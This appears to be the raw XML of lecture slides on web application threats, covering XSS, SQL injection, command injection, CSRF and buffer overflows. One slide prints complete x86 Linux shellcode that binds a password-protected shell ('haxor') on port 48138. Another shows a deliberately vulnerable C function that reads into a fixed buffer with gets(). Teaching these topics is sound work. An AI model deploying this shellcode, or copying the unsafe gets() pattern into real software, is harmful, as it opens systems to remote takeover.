              <a:t>Buffer Overflows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalu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70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Example of shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>BY NRAZIZ * * */ /* * Binds to port 48138 * Password: haxor */ char bindcode[]=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    "\x31\xdb\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80" "\x31\xd2\x52\x66\x68\xbc\x0a\x66\x6a\x02\x89\xe2\x6a" "\x10\x52\x6a\x03\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x6a" "\x02\x6a\x03\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x31\xc9" "\x51\x51\x6a\x03\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x31" "\xdb\x53\x6a\x3a\x68\x50\x61\x73\x73\x89\xe6\x6a\x05" "\x56\x6a\x04\x89\xe1\xb3\x09\xb0\x66\xcd\x80\x31\xc9" "\x31\xf6\x51\x6a\x05\x52\x6a\x04\x89\xe1\xb3\x0a\xb0" "\x66\xcd\x80\x31\xc9\x51\x6a\x72\x68\x68\x61\x78\x6f" "\x89\xe7\x89\xd6\x80\xc1\x05\xfc\xf3\xa6\x75\xbf\x31" "\xc9\xb3\x04\xb0\x3f\xcd\x80\x41\x83\xf9\x03\x75\xf6" "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e" "\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xb0" "\x01\xcd\x80“</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="8229600" cy="487362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus"/>
              </a:rPr>
              <a:t>Buffer Overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus"/>
              </a:rPr>
              <a:t>Continued</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalu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900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>void get_input() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	char buf[1024];    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	gets(buf);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1900" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>void main (int argc, char *argv[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	get_input();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malicious User enters &gt;1024 chars, but buf can only stores 1024 chars;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Extra chars overflow the buffer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="8229600" cy="411162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus"/>
              </a:rPr>
              <a:t>Buffer Overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus"/>
              </a:rPr>
              <a:t>Continued - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="1066800"/>
            <a:ext cx="1905000" cy="17621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0" y="2438400"/>
            <a:ext cx="5105400"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accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus"/>
              </a:rPr>
              <a:t>Thank You</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalu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ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
                <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Technologies Involved</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1600200"/>
            <a:ext cx="2057399" cy="1295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09800" y="2590800"/>
            <a:ext cx="1676400" cy="10096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724400" y="2514600"/>
            <a:ext cx="1181100" cy="828675"/>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6781800" y="1066800"/>
            <a:ext cx="1247775" cy="676275"/>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6172200" y="3352800"/>
            <a:ext cx="2424113" cy="127635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6781800" y="2133600"/>
            <a:ext cx="2195513" cy="94297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7772400" y="4648200"/>
            <a:ext cx="1171575" cy="676275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2058" name="Picture 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="1219200"/>
            <a:ext cx="1190625" cy="990599"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2059" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038600" y="3657600"/>
            <a:ext cx="2133600" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2060" name="Picture 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="5105400"/>
            <a:ext cx="2228850" cy="1104900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2061" name="Picture 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="4724400"/>
            <a:ext cx="1885950" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2064" name="Picture 16"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3886200"/>
            <a:ext cx="1905000" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2065" name="Picture 17"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="1676400"/>
            <a:ext cx="1743075" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2066" name="Picture 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="5710238"/>
            <a:ext cx="2200275" cy="11477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u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
                <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Typical Web Application Structure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
              <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 11"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="4953000"/>
            <a:ext cx="914400" cy="1219200"/>
            <a:chOff x="5791200" y="2438400"/>
            <a:chExt cx="1019175" cy="1809750"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 7" descr="firefox.jpg"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5867400" y="2438400"/>
              <a:ext cx="807983" cy="762000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 8" descr="ie logo.jpg"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5791200" y="3200400"/>
              <a:ext cx="1019175" cy="1047750"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Left-Right Arrow 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2214208" flipV="1">
            <a:off x="860425" y="2217738"/>
            <a:ext cx="914400" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF99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9" name="Left-Right Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2214208" flipV="1">
            <a:off x="2689225" y="3513138"/>
            <a:ext cx="914400" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF99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0" name="Left-Right Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2214208" flipV="1">
            <a:off x="4594225" y="4656138"/>
            <a:ext cx="914400" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF99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1" name="Left-Right Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="5410200"/>
            <a:ext cx="762000" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="lef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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 16"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="1143000"/>
            <a:ext cx="704850" cy="1343025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 17"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="2438400"/>
            <a:ext cx="838200" cy="1152525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="4191000"/>
            <a:ext cx="590550" cy="1152525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 19"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7620000" y="5181600"/>
            <a:ext cx="666750" cy="1162050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 16"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="3505200"/>
            <a:ext cx="590550" cy="1162050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 17"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="2209800"/>
            <a:ext cx="709613" cy="609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Cross-Site Scripting(XXS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Parameter Tampering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookie Poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-Site Request Forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Buffer Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
                <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Common Web application Threats</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
              <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>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1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>  XSS is a vulnerability which is present in websites or web applications, allows malicious users (Hackers) to insert their client side code (normally JavaScript) in those web pages. When this malicious code along with the original webpage gets displayed in the web client (browsers like IE, Mozilla etc), allows Hackers to gain greater access of that page.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
